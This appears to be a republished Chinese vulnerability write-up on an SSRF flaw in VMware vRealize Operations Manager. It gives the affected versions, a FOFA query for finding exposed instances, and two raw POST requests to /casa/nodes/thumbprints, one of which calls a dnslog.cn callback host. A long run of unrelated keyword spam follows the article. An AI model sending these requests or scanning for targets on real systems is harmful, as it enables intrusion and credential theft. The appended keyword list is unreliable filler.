VMware vRealize Operations Manager SSRF漏洞的示例分析
发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,这篇文章给大家介绍VMware vRealize Operations Manager SSRF漏洞的示例分析,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。漏洞描述vRealiz
千家信息网最后更新 2025年02月01日VMware vRealize Operations Manager SSRF漏洞的示例分析
这篇文章给大家介绍VMware vRealize Operations Manager SSRF漏洞的示例分析,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
漏洞描述
vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),以窃取管理凭据。
漏洞影响
vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0
cloud_foundation: 4.x 3.x
vRealize_suite_lifecycle_manager: 8.x
漏洞复现
使用FOFA语句包含关键字查找FOFA语句(仅供学习参考,请勿非法利用)
title="vRealize Operations Manager"
访问登录页面如下
发送请求包如下
POST /casa/nodes/thumbprints HTTP/1.1Host: 127.0.0.1Content-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Length: 24["tw9ao5.dnslog.cn"]
POST /casa/nodes/thumbprints HTTP/1.1Host:127.0.0.1Content-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Length: 24["127.0.0.1:443/ui"]
关于VMware vRealize Operations Manager SSRF漏洞的示例分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
示例
分析
内容
更多
服务器
语句
参考
帮助
攻击
服务
不错
关键
关键字
兴趣
凭据
可以通过
小伙
小伙伴
恶意
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网络安全管理学案例
中央网络安全宣传活动
币安网络安全中心
深圳市林创网络技术有限公司
查询同名同姓人数数据库
服务器地址和出口ip
国密算法加密的服务器
服务器安装程序不上网
网络安全法班会材料
ip安全可信服务器
重庆网络技术分类代理商
服务器电源亮红灯
网络技术服务热线
网络安全手抄报小图案
分析型数据库mysql版
网络安全服务关键步骤
为什么会显示微信数据库有损坏
网络安全行动的目的
db2命令连接数据库无效
安卓手机软件开发应用
数据库 锁
四川软件开发咨询青岗科技
重庆项目软件开发多少钱
胜利之日的服务器有人维护吗
获取服务器资源失败数据为空
防护1000的服务器
标准网络安全手抄报四年级上册
服务器机箱主板安装
uk开票服务器连接异常
网络安全 探针